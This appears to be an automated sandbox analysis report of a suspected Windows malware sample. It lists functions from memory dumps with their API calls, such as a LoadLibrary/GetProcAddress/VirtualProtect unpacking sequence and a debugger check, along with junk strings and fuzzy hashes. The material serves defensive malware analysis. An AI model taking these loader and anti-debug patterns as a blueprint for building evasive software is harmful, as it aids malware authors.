Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000012.00000002.330456850.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: f011721a65e637b70558abfa7ff97a629b9e28d59a94cb7349b8908f47978591
Instruction ID: c9128524272919db4071d016e368c832c930b36d74f35c43d3039e04d983ac6b
Opcode Fuzzy Hash: f011721a65e637b70558abfa7ff97a629b9e28d59a94cb7349b8908f47978591
Instruction Fuzzy Hash: ADF0C272304244FBDB01AF948DA1EAE3265AB44355F204977B753B80F1CA7DC512AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019C0, Relevance: 3.0, APIs: 2, Instructions: 41sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000012.00000002.330456850.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 830d97e4aa38939fe6a0ba024ee8ca959389ae08b10c71b31fdc54db1b38a647
Instruction ID: 77f4f58ad70177de11a0d2c10a1031ab6784e6ffca1e9eb20b8bff71da297da0
Opcode Fuzzy Hash: 830d97e4aa38939fe6a0ba024ee8ca959389ae08b10c71b31fdc54db1b38a647
Instruction Fuzzy Hash: FCF0C272304205FBDB01AE94CD91EAE3325AB44315F204977B603B80F1CA3D8512AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 0041E630, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 298memorythreadlibraryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(004395A0), ref: 0041E64E
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0041E6DB
GetCommState.KERNEL32(00000000,?), ref: 0041E7BC
GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041E7DB
IsProcessorFeaturePresent.KERNEL32(00000000), ref: 0041E7E3
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E7F1
GetLastError.KERNEL32 ref: 0041E823
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041E837
InterlockedDecrement.KERNEL32(?), ref: 0041E87E
LoadLibraryA.KERNEL32(00426134), ref: 0041E8DC
GlobalFix.KERNEL32(00000000), ref: 0041E8E4
LocalAlloc.KERNELBASE(00000000,0239DEC4), ref: 0041E8F5
SetThreadLocale.KERNEL32(00000000), ref: 0041E935
HeapWalk.KERNEL32(00000000,00000000), ref: 0041E93F
WriteProfileStringW.KERNEL32(00426270,004261E8,00426158), ref: 0041E954
EnumResourceNamesA.KERNEL32(00000000,00426370,00000000,00000000), ref: 0041E99A
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041E9A2
OpenSemaphoreA.KERNEL32(00000000,00000000,004263B4), ref: 0041E9D5
GetSystemTime.KERNEL32(00000000), ref: 0041E9DD
WriteProfileSectionW.KERNEL32(00426408,004263D4), ref: 0041EA28
ReleaseActCtx.KERNEL32(00000000), ref: 0041EA3F
FatalAppExitA.KERNEL32(00000000,0042613C), ref: 0041EA4C
UnregisterWait.KERNEL32(00000000), ref: 0041EA69
UnregisterWaitEx.KERNEL32(00000000,00000000), ref: 0041EA73
FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,00426490,?), ref: 0041EA8B
InterlockedDecrement.KERNEL32(?), ref: 0041EA98
FindAtomW.KERNEL32(004264C0), ref: 0041EADB
SetThreadContext.KERNEL32(00000000,00000000), ref: 0041EAE5
OpenMutexW.KERNEL32(00000000,00000000,00426514), ref: 0041EAF4
GetConsoleMode.KERNEL32(00000000,00000000), ref: 0041EB45
SetConsoleTitleW.KERNEL32(00426538), ref: 0041EB50
CopyFileExW.KERNEL32(0042659C,00426558,00000000,00000000,00000000,00000000), ref: 0041EB68

Strings

";, xrefs: 0041E9A8
onI, xrefs: 0041E8A1
Pc, xrefs: 0041EAAF
sapupe, xrefs: 0041E667
&Pc, xrefs: 0041EB08

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Console$DecrementFileFindInterlockedOpenProfileSectionStringThreadUnregisterWaitWrite$AliasesAllocAtomCommCompletionContextCopyEnumEnvironmentErrorExitFatalFeatureFreeGlobalHeapLastLengthLibraryLoadLocalLocaleModeMutexNamesOverlappedPresentProcessorQueuedReleaseResourceResultSemaphoreSizeStateStatusStringsSystemTimeTitleWalklstrlen
String ID: ";$&Pc$Pc$onI$sapupe
API String ID: 3555784277-1163723601
Opcode ID: 7913fe0c06971ee693541ec9c6da0725219078824327ee7f961c0673dae388b0
Instruction ID: 894d5077bc5e13f4873662bc39ca7e2204b0e2aff3a4029963a92a6cebbd2bd6
Opcode Fuzzy Hash: 7913fe0c06971ee693541ec9c6da0725219078824327ee7f961c0673dae388b0
Instruction Fuzzy Hash: 47C1C874E84214DBE760AB61DC0ABD877B0BB14B05F10C0EAE54D662C1CBB969C9CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D340, Relevance: 37.1, APIs: 3, Strings: 18, Instructions: 324librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00425F18), ref: 0041D378
GetProcAddress.KERNEL32(0239DEC0,004395A0), ref: 0041DD2B
VirtualProtect.KERNELBASE(02396008,0239DEC4,00000040,?), ref: 0041DD4F

Strings

-tIO, xrefs: 0041D9EF
QGk , xrefs: 0041D88F
]k;z, xrefs: 0041D980
v;M, xrefs: 0041DB51
snkr, xrefs: 0041DC0D
8j/, xrefs: 0041D3C3
L|j, xrefs: 0041DB9E
@, xrefs: 0041DC98
2h, xrefs: 0041DAAB
T^Yu, xrefs: 0041D657
U!8, xrefs: 0041D3F5
G6~0, xrefs: 0041D5A6
M{h, xrefs: 0041D78F
25r3, xrefs: 0041D885
Yh, xrefs: 0041D445
=Mbt, xrefs: 0041DC61
QB4, xrefs: 0041D3FF
%&C, xrefs: 0041D767

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: 8j/$ %&C$-tIO$25r3$2h$=Mbt$@$G6~0$M{h$QB4$QGk $T^Yu$U!8$Yh$]k;z$snkr$L|j$v;M
API String ID: 3509694964-3870779105
Opcode ID: 6a656c566e4158b38683bb604575756049404af3c967f302f306fd950cf85796
Instruction ID: ad2b14a81b9b61d11a5cdc4c03d3145e3531acbd3316b8dcd82290f56a266895
Opcode Fuzzy Hash: 6a656c566e4158b38683bb604575756049404af3c967f302f306fd950cf85796
Instruction Fuzzy Hash: B932EAB5D063A8CFDB65CFA6A9897CDBB70BB15304F6082C8D5492B211CB714AC5CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0, Relevance: 10.8, APIs: 7, Instructions: 326COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0040D200
GetFileType.KERNEL32(?), ref: 0040D487

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: 413cfad40856d5793cc67c7cd752d90fe8a580e44ecc4bbb71abfb8ba665c806
Instruction ID: 45d184aa1cf0ff50618850f313264eaebdb35a8146bc4d478e456a0ec73ef952
Opcode Fuzzy Hash: 413cfad40856d5793cc67c7cd752d90fe8a580e44ecc4bbb71abfb8ba665c806
Instruction Fuzzy Hash: 3CE11B74E04248DFDB24CFA8C894B9DFBB1BB49314F24866ED8656B382C735A846CF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004105A0, Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418A3D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418A54
UnhandledExceptionFilter.KERNEL32(004250D8), ref: 00418A5F
GetCurrentProcess.KERNEL32(C0000409), ref: 00418A7D
TerminateProcess.KERNEL32(00000000), ref: 00418A84

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 81ce489040b7c4ba0222b359d94b47ac924f6cfd74f6715105254163967c367f
Instruction ID: b5a31193f26d8ccf6667da52b2cf7a18394332f09fd5dd4b5e4c2c5c3fef38fd
Opcode Fuzzy Hash: 81ce489040b7c4ba0222b359d94b47ac924f6cfd74f6715105254163967c367f
Instruction Fuzzy Hash: 57211EB8805A04EFDB00CF64FC4568A7BA4FB48310F10A9BAE80892361EBB14C85CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00416E99, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
_get_int64_arg.LIBCMTD ref: 00416F50
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117
_write_multi_char.LIBCMTD ref: 0041721E
_write_string.LIBCMTD ref: 00417239
_write_multi_char.LIBCMTD ref: 00417265

Strings

-, xrefs: 004171BE
9, xrefs: 00417128

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_write_string
String ID: -$9
API String ID: 1652289597-1631151375
Opcode ID: 0dbc64d26de664043c98c38d7d055fcac562ce58b769552add859a401e78c35f
Instruction ID: de5102fec8321e5b85d0cfec1799047ba640386d01976f94451ff98cb5dc2b5e
Opcode Fuzzy Hash: 0dbc64d26de664043c98c38d7d055fcac562ce58b769552add859a401e78c35f
Instruction Fuzzy Hash: BAF107B1D052299FDB24CF58CC99BEEB7B5BB48304F1481DAE419A6281D7389EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040912C, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 293COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
_get_int64_arg.LIBCMTD ref: 004091E9
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3
_write_multi_char.LIBCMTD ref: 004094CC
_write_multi_char.LIBCMTD ref: 00409513
__mbtowc_l.LIBCMTD ref: 00409582

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l
String ID: 9
API String ID: 374834154-2366072709
Opcode ID: 84ce5aae74adba7d399d0073aecd8e076bd34cf307cfa0898392016893d53613
Instruction ID: 2be826c27a8f202ffec1e2aebc170ca3e02e3105113296a5b3e0d73e26e3a3a1
Opcode Fuzzy Hash: 84ce5aae74adba7d399d0073aecd8e076bd34cf307cfa0898392016893d53613
Instruction Fuzzy Hash: 1ED13AB1D10219DFDB14CF99C881BEEB7B5BB89304F0445AAE509B7282D7389E84CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041E430, Relevance: 18.1, APIs: 12, Instructions: 90memorypipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0041E458
GetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 0041E46E
GetPrivateProfileIntW.KERNEL32(0042601C,00425F28,00000000,00000000), ref: 0041E482
VirtualFree.KERNEL32(00000000,00000000,00000000), ref: 0041E49A
GetSystemWindowsDirectoryA.KERNEL32(?,00000400), ref: 0041E4AC
GetCPInfoExA.KERNEL32(00000000,00000000,?), ref: 0041E4BD
GetCommandLineA.KERNEL32 ref: 0041E4C3
GetStartupInfoW.KERNEL32(00000000), ref: 0041E4CB
InterlockedDecrement.KERNEL32(?), ref: 0041E52F
CreateNamedPipeW.KERNEL32(00426058,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E548
SetCurrentDirectoryA.KERNEL32(0042609C), ref: 0041E553
HeapWalk.KERNEL32(00000000,00000000), ref: 0041E5A3

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Info$Directory$CommandConsoleCountCreateCurrentCursorDecrementFreeHeapInterlockedLineNamedPipePrivateProfileStartupSystemTickVirtualWalkWindows
String ID:
API String ID: 2147620772-0
Opcode ID: cecc40e3c7b38ccbb9f5ff2caa16f3f4e71e93e1916b3ddd97130b83a6e4a3aa
Instruction ID: d97dbd9e76f23836a673f845a15841c44cfc199f16a5a4d835db94ee5555d062
Opcode Fuzzy Hash: cecc40e3c7b38ccbb9f5ff2caa16f3f4e71e93e1916b3ddd97130b83a6e4a3aa
Instruction Fuzzy Hash: A0313E74D84214EFDB20DBA1ED09BD93B75BB1870AF1080AAF909661C1C7B819C5DF0D

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD80, Relevance: 16.6, APIs: 11, Instructions: 52librarypipetimeCOMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(00425EAC), ref: 0041DD9B
LoadLibraryA.KERNEL32(00425EB4), ref: 0041DDA6
SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041DDB4
CompareFileTime.KERNEL32(?,?), ref: 0041DDC5
GetVersionExA.KERNEL32(?), ref: 0041DDD2
GetCurrentThreadId.KERNEL32 ref: 0041DDD8
CreateDirectoryA.KERNEL32(00425ED4,00000000), ref: 0041DDE5
LoadLibraryA.KERNEL32(00000000), ref: 0041DDED
IsSystemResumeAutomatic.KERNEL32 ref: 0041DDF3
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041DDFB
CompareStringW.KERNEL32(00000000,00000000,00425F00,00000000,00425EF4,00000000), ref: 0041DE13

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: CompareLibraryLoad$AutomaticCreateCurrentDirectoryDriveEnvironmentFileFreeHandleNamedPipeResumeStateStringStringsSystemThreadTimeTypeVersion
String ID:
API String ID: 1734459017-0
Opcode ID: 47952564a674249da837fae05404b2cfca3d707973fb104f4960e42da1825a15
Instruction ID: 404ba83a64db7c25861e552beb4f5902b58ed14302f8c2ba7e4cb25f3e76dfc2
Opcode Fuzzy Hash: 47952564a674249da837fae05404b2cfca3d707973fb104f4960e42da1825a15
Instruction Fuzzy Hash: 06113D75A81704EFD710DBA4EC4ABD83B74BB09B01F2080B5F2099A1D2D7B46A59CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00416A45, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00416A49
_write_multi_char.LIBCMTD ref: 0041721E
_write_string.LIBCMTD ref: 00417239
_write_multi_char.LIBCMTD ref: 00417265

Strings

-, xrefs: 004171BE

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _write_multi_char$_get_int_arg_write_string
String ID: -
API String ID: 3433125407-2547889144
Opcode ID: f955fdb29d5cb245bbbe8d6ba3b239ef453b249a0d961018c9ec56271ebe623c
Instruction ID: b0b7e6b1a2df9b203622afa6e2312ec93aa3ef50dd7f1b98807660a7c6530afa
Opcode Fuzzy Hash: f955fdb29d5cb245bbbe8d6ba3b239ef453b249a0d961018c9ec56271ebe623c
Instruction Fuzzy Hash: A5A14BB1D052289FDB64CF54CC89BEEB7B1BB44304F1481DAE4196A291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC48, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

', xrefs: 0040BC48
9, xrefs: 0040BEA9
0, xrefs: 0040BC64

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 41f2b569890593c4048fa512c3629f89190daf6dd3fae914f0326bdc5b092988
Instruction ID: a9176a38141aa6e70ae73083284ee1a40d885ade85415e6101a7527418f99f31
Opcode Fuzzy Hash: 41f2b569890593c4048fa512c3629f89190daf6dd3fae914f0326bdc5b092988
Instruction Fuzzy Hash: AA41F271904229CFDB64CF48C889BEEB7B5FF44304F1085AAD009AB281C7389E81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00416EC7, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

0, xrefs: 00416EE3
9, xrefs: 00417128
', xrefs: 00416EC7

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 3a5f572e761f4631e86f663acba891b042cfc1c93ae2657cad725c256c759a3e
Instruction ID: cab43cc4f818fb9407e5acb3544fd95266a9e65c28d1772f894ad5478e63d53e
Opcode Fuzzy Hash: 3a5f572e761f4631e86f663acba891b042cfc1c93ae2657cad725c256c759a3e
Instruction Fuzzy Hash: 4F41D271D09229DFDB24CF58C899BEEBBB5BB48304F1481DAD409A7241C7389AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2FB, Relevance: 10.6, APIs: 7, Instructions: 90fileCOMMON

Download Yara Rule

APIs

ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 0041E34D
CopyFileA.KERNEL32(00425E20,00425D9C,00000000), ref: 0041E395
DeleteFileA.KERNEL32(00425E4C), ref: 0041E3A0
GetPriorityClass.KERNEL32(00000000), ref: 0041E3BA
SetEvent.KERNEL32(00000000), ref: 0041E3C2
GetPrivateProfileStringA.KERNEL32(00425E8C,00425E78,00425E70,?,00000000,00425E54), ref: 0041E3F6
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041E406

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: File$Read$CharacterClassConsoleCopyDeleteEventOutputPriorityPrivateProfileString
String ID:
API String ID: 655431097-0
Opcode ID: dc015eed9a92f3d7e43de895b688d7b286621dfa03e5760362728549e43f0ec0
Instruction ID: 9b00ba8f3d5a6cd07e5bbcc28f8ebffdca5ec8cd01da0624c2f2f2f708a4bb1b
Opcode Fuzzy Hash: dc015eed9a92f3d7e43de895b688d7b286621dfa03e5760362728549e43f0ec0
Instruction Fuzzy Hash: 2C31AE74E4021CEFDB04DFA4D845BEE7BB5BF48701F1085AAE909A7281C7B42A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E310, Relevance: 10.6, APIs: 7, Instructions: 79fileCOMMON

Download Yara Rule

APIs

ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 0041E34D
CopyFileA.KERNEL32(00425E20,00425D9C,00000000), ref: 0041E395
DeleteFileA.KERNEL32(00425E4C), ref: 0041E3A0
GetPriorityClass.KERNEL32(00000000), ref: 0041E3BA
SetEvent.KERNEL32(00000000), ref: 0041E3C2
GetPrivateProfileStringA.KERNEL32(00425E8C,00425E78,00425E70,?,00000000,00425E54), ref: 0041E3F6
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041E406

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: File$Read$CharacterClassConsoleCopyDeleteEventOutputPriorityPrivateProfileString
String ID:
API String ID: 655431097-0
Opcode ID: 1f44c4c86475a9a733066a0fcd6cf6318109c14345282bc8602f8e4075fa0c34
Instruction ID: 5dec7fa8a1a7b7cf657ff338b5ae2cb803ec3e5d0d267fa6a4b9384d695617a8
Opcode Fuzzy Hash: 1f44c4c86475a9a733066a0fcd6cf6318109c14345282bc8602f8e4075fa0c34
Instruction Fuzzy Hash: 1B31BF74E4021CEFDB04DFA4D845BEEBBB5FB58701F1081AAE905A3280C7B42A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E5B2, Relevance: 10.5, APIs: 7, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000), ref: 0041E5C1
SetConsoleMode.KERNEL32(00000000,?), ref: 0041E5D0
IsDBCSLeadByteEx.KERNEL32(00000000,00000000), ref: 0041E5DA
FindFirstChangeNotificationA.KERNEL32(004260D8,00000000,00000000), ref: 0041E5E9
LCMapStringW.KERNEL32(00000000,00000000,004260E0,00000000,?,00000000), ref: 0041E603
InterlockedIncrement.KERNEL32(?), ref: 0041E610
TlsSetValue.KERNEL32(00000000,00000000), ref: 0041E61A

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: ByteChangeConsoleFindFirstIncrementInterlockedLeadModeNotificationStringTerminateThreadValue
String ID:
API String ID: 1978024113-0
Opcode ID: d29957098e37e704b0c0a0cb067615934720143c004740a8b03a3b7ff935b27b
Instruction ID: c59d914e56b4906dc3a12347fb6c4cfd07202ad8e4fe7166384c5a6c76d5b709
Opcode Fuzzy Hash: d29957098e37e704b0c0a0cb067615934720143c004740a8b03a3b7ff935b27b
Instruction Fuzzy Hash: E2F01235384314BFE7609BA0AD4BF953B64AB49B02F1180A5F709A90D1CAA068058B29

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4E0, Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 0041C504

Part of subcall function 0041CE70: CreateFileA.KERNEL32(00425B94,40000000,00000003,00000000,00000003,00000000,00000000,?,0041C509), ref: 0041CE89

GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0041C589
WideCharToMultiByte.KERNEL32(00000000), ref: 0041C590
WriteConsoleA.KERNEL32(00428FA4,00000000,?,?,00000000), ref: 0041C5B7

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 53c9fbec9189f412cbd067db4eeef7a4c94e04826d885bc6e862bfc5cd252841
Instruction ID: 8e556848e2d6192a746df83962f0c4829bdb1a0d329698464e8284f442c293b9
Opcode Fuzzy Hash: 53c9fbec9189f412cbd067db4eeef7a4c94e04826d885bc6e862bfc5cd252841
Instruction Fuzzy Hash: 7421E470641214FFDB20CB54DD88BEE376AAB18714F50813AF505871D0DB78A986DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00416CE1, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

-, xrefs: 004171BE

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 190d33c813cfad49f95f87c1c667e7d790d64d822710270c5ba9b2ae63f44dc0
Instruction ID: f156c5a66beefe8da8e5027b200073f068bb201c3c032479eb7dd00da23d02f1
Opcode Fuzzy Hash: 190d33c813cfad49f95f87c1c667e7d790d64d822710270c5ba9b2ae63f44dc0
Instruction Fuzzy Hash: D2D16DB1D052289FDB24CF94DC89BEEB7B1BB84304F14819AE419A7291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416C1A, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMTD ref: 0041721E
_write_string.LIBCMTD ref: 00417239
_write_multi_char.LIBCMTD ref: 00417265

Strings

-, xrefs: 004171BE

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _write_multi_char$_write_string
String ID: -
API String ID: 2640999400-2547889144
Opcode ID: 15b099cb79f4cf7dd23e8e014a851e4ea3bcdd5809610859f4cfd3b54fb8d472
Instruction ID: 84ee0cdb0e7e5685b42efbcb11216d7a8bd3e47fba7ca3867be65e2018b65f73
Opcode Fuzzy Hash: 15b099cb79f4cf7dd23e8e014a851e4ea3bcdd5809610859f4cfd3b54fb8d472
Instruction Fuzzy Hash: E29160B0D052289BEB24DF55CC89BEEB7B1EB44304F1041DAE9197A291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC35, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

9, xrefs: 0040BEA9
0, xrefs: 0040BC64

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 294fb31f5d5d351f2e778bf710c0b296c7a64999d3d16a53a5e2e0d47d44c5da
Instruction ID: a303c6598a7c0b3fe076eda218baccae4e4fa84bb0be4dc7c9ebc0a6f9473dd9
Opcode Fuzzy Hash: 294fb31f5d5d351f2e778bf710c0b296c7a64999d3d16a53a5e2e0d47d44c5da
Instruction Fuzzy Hash: 9D41E271914229DFDB64DF48C889BEEB7B5FF44304F1085AAD449BB281C7389A81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00416EB4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

0, xrefs: 00416EE3
9, xrefs: 00417128

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 872c494957aaf89aa66f31ff1cc896ed29463f1129b8cf86eb06cc3f740f7456
Instruction ID: 143972cb1e8ddfa57849f32d30c8335497bce158e6f578cb2d9d7d7fa9ded8cb
Opcode Fuzzy Hash: 872c494957aaf89aa66f31ff1cc896ed29463f1129b8cf86eb06cc3f740f7456
Instruction Fuzzy Hash: F041F2B1D19229DFDB24CF58C899BEEBBB5BB48304F1081DAE409A7240C7389AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040915A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4
', xrefs: 0040915A

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: 02dd4c31f3f119763d5193a35ee269ab6f0a67ab0387459a7a184376ccaae2b9
Instruction ID: a994f4636d4fd1d8c743fec6b514407a93f3c6a9cf75fa51588181e81b9d09a8
Opcode Fuzzy Hash: 02dd4c31f3f119763d5193a35ee269ab6f0a67ab0387459a7a184376ccaae2b9
Instruction Fuzzy Hash: 264107B1E101299FDB24CF48C981BAEB7B5FF85314F1444EA9549BB282D3785E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0041C713, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

__isatty.LIBCMTD ref: 0041C7F9
__getbuf.LIBCMTD ref: 0041C809
__write.LIBCMTD ref: 0041C891

Strings

RaA, xrefs: 0041C88D, 0041C7F5, 0041C7F8, 0041C890

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __getbuf__isatty__write
String ID: RaA
API String ID: 2861569966-3980658732
Opcode ID: 2ab0db8e475f85831f16af68bc40a134e9c1cc053892d49486d74af1d5760d03
Instruction ID: 62080d9dc68f04e14b8155d4cf95af235b0486f5fb7492b7c03328038fc6fe9a
Opcode Fuzzy Hash: 2ab0db8e475f85831f16af68bc40a134e9c1cc053892d49486d74af1d5760d03
Instruction Fuzzy Hash: 7C51E974A40209EFDB14DF94C8D1AADBBB1FF88324F148299E4456B395D734EA81CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00409147, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
__aullrem.LIBCMT ref: 00409391
